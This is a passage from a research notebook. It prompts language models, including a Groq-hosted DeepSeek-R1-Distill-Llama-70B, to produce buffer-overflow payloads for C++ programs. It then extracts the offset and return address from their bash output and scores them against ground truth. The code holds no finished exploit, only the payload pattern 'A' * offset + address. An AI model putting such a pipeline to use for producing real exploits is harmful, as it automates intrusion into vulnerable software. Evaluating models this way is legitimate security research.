# Phase-3 output files named file_<digits>_cpp_3.txt; group 1 is the numeric id.
pattern = re.compile(r'^file_(\d{1,10})_cpp_3\.txt$')
# Upper bound used in the offset comparison inside the loop below.
tresh = 100
total_elements = 0
processed_elements_of_cpp_dataset = []

# Subset of samples which will be used to rerun the chitchat using CoT and few-shot in-context learning
subset=[]

for file in os.listdir('./phase_outputs/model_b'):
    filematch = pattern.match(file)

    if not filematch:
        continue  
    total_elements+=1
    index = int(filematch.group(1))  # estrae indice dataset
    processed_elements_of_cpp_dataset.append(index)
    # print(f"File: {file}, Indice numerico: {index}")
    if os.path.isfile(f'./phase_outputs/model_b/{file}') and os.path.isfile(f'./phase_outputs/model_a/{file}'):
        with open(f"./phase_outputs/model_b/{file}",'r') as f:
            model_b_output = f.read()
        with open(f"./phase_outputs/model_a/{file}",'r') as f:
            model_a_output = f.read()
        try:
            
    
            pattern2 = re.compile(r"```bash\s*\n(.*?)\n\s*```", re.DOTALL)
            
            match = pattern2.search(model_b_output)
            if match:
                code = match.group(1)
                p_offset,p_ret_address = extract_offset_and_address(code)
    
                if p_offset and p_ret_address:
    
                    if offset<tresh:
                        true_offset, true_match_address = extract_info(model_a_output)
                        if true_match_address and true_offset:
                            if true_match_address == p_ret_address and p_offset == true_offset:
                                print(f"\n[Dataset Index {index}] \033[33mValid\033[0m Payload: A * {p_offset} + {p_ret_address}\n")
                                valid_elements.append(f'"A" * {p_offset} + {p_ret_address}')
                            else:
    #                             print(f"""\n[Dataset Index {index}] Invalid Payload:
    # Return Address Generated\tReturn Address Expected
    # {p_ret_address}\t{true_match_address}""")
                                skipped_elements['return_address_or_offset_different_from_expected']+=1
                                subset.append(index)
                                continue
    
                        else:
                            # print(f"[Dataset Index {index}] No Ground Truth return address found in ModelA response: {model_a_output}")
                            skipped_elements['ground_truth_return_address_or_offset_not_found']+=1
                            subset.append(index)
                            continue
    
                    else:
                        # print(f"\n[Dataset Index {index}] Invalid Payload: Offset calculated is too big: offset={p_offset}\n")
                        skipped_elements['invalid_offset']+=1
                        continue
    
    
            else:
    #             print(f"""\n[Dataset Index {index}] Invalid Payload: output from response model, doesn't match the expected format
    # expected format:
    # ```bash
    # ...
    # ```
    # Model B Response:
    # {model_b_output}
    # """)
                skipped_elements['invalid_model_b_response']+=1
                subset.append(index)
                continue
    
        except Exception as e:
            print(f'raised exception in model response parsing: {e} - index {index}')
            skipped_elements['from_exception']+=1
        
    

In [None]:
# Share of the dataset for which a valid payload was recorded
valid_count = len(valid_elements)
dataset_size = len(cpp_dataset)
print(f"valid payloads: {valid_count}/{dataset_size} ({valid_count/dataset_size*100:.2f}%)")


In [None]:
import matplotlib.pyplot as plt


# One bar per skip reason, in the dictionary's own order
labels = [reason for reason in skipped_elements]
values = [skipped_elements[reason] for reason in labels]

print(f"Total Skipped elements: {sum(values)}/{total_elements}")

# Bar chart of how many samples were skipped for each reason
plt.figure(figsize=(10, 5))
plt.bar(labels, values, color='skyblue')

# Title and axis labels
plt.title('Skipped Elements Histogram', fontsize=14)
plt.xlabel('Skip Reasons', fontsize=12)
plt.ylabel('Count', fontsize=12)

# Slanted tick labels stay readable; horizontal grid lines help compare bar heights
plt.xticks(rotation=45, ha="right")
plt.grid(axis='y', linestyle='--', alpha=0.7)

plt.show()


## Running with Groq-hosted DeepSeek-R1-Distill-Llama-70B (Model B, phase 3 only)

In [None]:
!pip install groq

In [None]:
import os

# Distinct "<prefix>cpp_" stems of the model-A output files whose name contains "cpp"
files = set()
for file in os.listdir('./phase_outputs/model_a'):
    stem, marker, _rest = file.partition('cpp')
    if marker:  # non-empty only when 'cpp' occurs in the file name
        files.add(f"{stem}cpp_")
len(files)

In [None]:
import os.path

# Split the base filenames by whether both an offset and an address can be
# extracted from their phase-3 model-A text.
valid_files = []
invalid_files = []
for file in files:
    filename_3 = f'{file}3.txt'
    phase3_path = f'./phase_outputs/model_a/{filename_3}'
    if not os.path.isfile(phase3_path):
        continue

    with open(phase3_path, 'r') as f:
        model_a_prompt = f.read()

    offset, little_endian_address = extract_info(model_a_prompt)
    if offset is None or little_endian_address is None:
        # Keep the full text so the failed extraction can be inspected later
        invalid_files.append({
            'offset': offset,
            'address': little_endian_address,
            'full_text': model_a_prompt,
        })
    else:
        valid_files.append(file)

In [None]:


from groq import Groq
def run_model(phase: int,model_a_prompt: str,model_b_prev_output=None):
    """Send one few-shot chat request to the Groq API and return the reply text.

    The conversation consists of the system prompt for *phase*, two worked
    examples (each a user turn followed by an assistant turn) and a final user
    turn built from *model_b_prev_output* followed by *model_a_prompt*.

    Args:
        phase: Phase number passed to ``get_system_prompt``, ``get_example_1``
            and ``get_example_2``.
        model_a_prompt: Text appended after the previous model-B output in the
            final user turn.
        model_b_prev_output: Text placed first in the final user turn. ``None``
            (the default) is treated as an empty string; previously it was
            rendered into the prompt as the literal text ``None``.

    Returns:
        The content of the first choice of the completion.

    Note:
        Reads the module-level ``api_key`` at call time, so a key switched by
        the caller is picked up on the next call.
    """
    previous_output = "" if model_b_prev_output is None else model_b_prev_output

    client = Groq(
        api_key=api_key,
    )
    example_1 = get_example_1(phase)
    example_2 = get_example_2(phase)

    # Same layout as before: previous output, newline, then the prompt indented
    # by four spaces and followed by a newline plus four spaces.
    final_user_turn = f"{previous_output}\n    {model_a_prompt}\n    "

    chat_completion = client.chat.completions.create(
        messages=[
            {"role": "system", "content": f"{get_system_prompt(phase)}"},
            {"role": "user", "content": example_1[0]},
            {"role": "assistant", "content": example_1[1]},
            {"role": "user", "content": example_2[0]},
            {"role": "assistant", "content": example_2[1]},
            {"role": "user", "content": final_user_turn},
        ],
        model="deepseek-r1-distill-llama-70b",
    )

    return chat_completion.choices[0].message.content
    
      

In [None]:
import os
import requests
# Pool of API keys handed out one at a time by switch_key (none are listed in this file)
api_key_list = [


]
def switch_key(list):
    """Remove and return the last key of *list*, or "" when no key is left.

    The list passed in is modified in place. The parameter name shadows the
    builtin ``list``; it is kept as is so existing callers are unaffected.
    """
    if not len(list):
        return ""
    return list.pop()

In [None]:
import re
# First ```bash fenced block of a response. Whitespace after the opening fence
# and before the closing fence is tolerated, so answers with trailing spaces or
# an indented closing fence are still recognised.
_BASH_BLOCK_RE = re.compile(r"```bash\s*\n(.*?)\n\s*```", re.DOTALL)


def parse_output(response):
    """Return the content of the first ```bash fenced block in *response*.

    Args:
        response: Model reply text. ``None`` or an empty string is accepted and
            yields ``""`` (a failed request leaves the caller without a reply;
            previously ``None`` raised ``TypeError`` here).

    Returns:
        The text between the fences, or ``""`` when there is no such block.
    """
    if not response:
        return ""
    match = _BASH_BLOCK_RE.search(response)
    return match.group(1) if match else ""

In [None]:
import json
import time

from tqdm import tqdm

# Query the Groq-hosted model once per validated file (phase 3), rotating API
# keys on rate limits, and record the extracted payload and the request time.
llama70_responses = []
exec_time = []
response=None
api_key=switch_key(api_key_list)

for file in tqdm(list(valid_files)):
  if api_key=="":
    # Every API key is used up: no further file can be queried.
    # NOTE(review): the result lists then cover only a prefix of valid_files.
    break

  print(f"Parsing {file}\n")
  filename_1 = f'{file}1.txt'
  filename_3 = f'{file}3.txt'

  with open(f'./phase_outputs/model_a/{filename_1}','r') as f:
    file_prompt = f.read()
  if 'program' in file_prompt:
    model_b_prev = file_prompt.replace('Explain to me how to exploit the following program:',"Given the code:")
  else:
    model_b_prev = file_prompt.replace('Explain to me how to exploit the following:',"Given the code:")

  with open(f'./phase_outputs/model_a/{filename_3}','r') as f:
    model_a_prompt = f.read()

  # Retry until a reply arrives, the keys run out, or an attempt fails after >= 60 s
  while response is None and api_key!="":
    start_time = time.time()  # start of this inference attempt
    try:
      response = run_model(3,model_a_prompt,model_b_prev)
      end_time = time.time()    # end of this inference attempt
    except Exception as e:
      end_time = time.time()    # end of this inference attempt
      print(e)
      if '429 ' in str(e):
        print("Hitted Rate Limit")
        api_key = switch_key(api_key_list)
      elif (end_time-start_time)<60:
        # Fix: wait for the remainder of the 60 s window. The previous
        # expression (60-end_time-start_time) was always negative, which makes
        # time.sleep raise ValueError.
        time.sleep(60-(end_time-start_time))
      else:
        break

  inference_time = end_time - start_time
  exec_time.append(inference_time)
  # Fix: without a reply there is nothing to parse; record an empty payload
  # instead of passing None to parse_output.
  code = parse_output(response) if response is not None else ""
  print(code)
  llama70_responses.append(code)
  response=None

# Fix: store the files that were actually queried, in query order, so that
# 'files'[i] corresponds to 'responses'[i]. The previous dump wrote the whole
# `files` set, which also contains files that were never queried.
with open('llama_70_responses.json','w') as f:
  json.dump({
      'files': list(valid_files)[:len(llama70_responses)],
      'responses':llama70_responses,
  },f)

In [None]:
# Keep only the first line of every extracted payload
cleaned_resp = [resp.partition('\n')[0] for resp in llama70_responses]

len(cleaned_resp)

In [None]:
# Rebuild, for every validated file, the two texts that were sent to the model:
# the rewritten phase-1 prompt (code) and the phase-3 prompt (program details).
code_data = []
program_details = []
for file in valid_files:
  print(f"Parsing {file}\n")

  with open(f'./phase_outputs/model_a/{file}1.txt','r') as f:
    file_prompt = f.read()
  # The phase-1 prompt starts with one of two intro sentences; swap it for "Given the code:"
  if 'program' in file_prompt:
    intro = 'Explain to me how to exploit the following program:'
  else:
    intro = 'Explain to me how to exploit the following:'
  model_b_prev = file_prompt.replace(intro,"Given the code:")
  code_data.append(model_b_prev)

  with open(f'./phase_outputs/model_a/{file}3.txt','r') as f:
    model_a_prompt = f.read()
  program_details.append(model_a_prompt)

In [None]:
import statistics
# Average duration, in seconds, of the timings collected in exec_time
statistics.mean(exec_time)

In [None]:
!pip -q install pandas
import pandas as pd
# Results table: one row per validated file, pairing the inputs with the
# generated payload and the time the request took
columns = {
    'code': code_data,
    'program_details': program_details,
    'attack_payload_gen': cleaned_resp,
    'base_filename': list(valid_files),
    'time': exec_time,
}
df = pd.DataFrame(columns)
df

In [None]:
# For every row, check whether the generated payload carries the same offset
# and address as the ones extracted from the program details
is_valid = []
for row in df.itertuples(index=True, name="Row"):
    print(f"Index: {row.Index}, filename: {row.base_filename}")
    offset, address = extract_info(row.program_details)
    generated_offset, generated_address = extract_offset_and_address(row.attack_payload_gen)
    if generated_offset != offset or generated_address != address:
        is_valid.append(False)
        continue
    is_valid.append(True)

In [None]:
# Attach the per-row True/False validation results as a new `is_valid` column
df = df.assign(is_valid=is_valid)
df

In [None]:
# Number of rows flagged valid (0 when there is none) and their share of all rows
total_rows = df.shape[0]
count = df['is_valid'].value_counts().get(True, 0)
print(f"Valid elements {count}/{total_rows}: {round(count/total_rows*100,2)!s}%")

In [None]:
# Save the results table to disk, one JSON object per row
df.to_json("llama70bdistildeepseek-responses.json", orient="records", indent=4)  # Pretty-printed JSON


In [None]:
# Text-generation pipeline built from `model` and `tokenizer`.
# NOTE(review): despite the `_2` suffix, this uses `model`/`tokenizer` rather than
# the second tokenizer (`tokenizer_2`) defined earlier in the notebook - confirm
# which model/tokenizer pair is intended here.
pipe_model_2 = pipeline(
    task="text-generation",
    model=model,
    tokenizer=tokenizer,
    max_new_tokens=100000,  # NOTE(review): very high generation cap - confirm it is intentional
    return_full_text=False, # If set to False only added text is returned, otherwise the full text is returned. Cannot be specified at the same time as return_text.
)